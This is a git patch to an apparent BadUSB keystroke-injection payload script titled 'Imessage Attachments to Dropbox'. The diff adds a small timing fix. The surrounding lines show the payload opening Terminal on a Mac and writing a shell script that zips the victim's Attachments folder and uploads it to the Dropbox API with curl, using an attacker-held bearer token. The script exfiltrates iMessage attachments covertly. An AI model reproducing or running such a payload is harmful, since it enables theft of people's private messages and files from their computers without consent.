From 628ea3fa9e53e1786ade4d4d0527c5db190cb743 Mon Sep 17 00:00:00 2001 From: Narsty Date: Wed, 21 Jun 2023 13:42:54 -0500 Subject: [PATCH] Update Imessage Attachments to Dropbox.txt --- Executions/Imessage Attachments to Dropbox.txt | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Executions/Imessage Attachments to Dropbox.txt b/Executions/Imessage Attachments to Dropbox.txt index 9b988a9..c0c94fc 100644 --- a/Executions/Imessage Attachments to Dropbox.txt +++ b/Executions/Imessage Attachments to Dropbox.txt @@ -45,6 +45,8 @@ DELAY 500 STRING terminal DELAY 1000 ENTER +DELAY 500 +CTRL c DELAY 1000 STRING echo 'cd ~/Desktop && zip -r attachments.zip Attachments && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/attachments.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @attachments.zip' > upload.sh DELAY 2000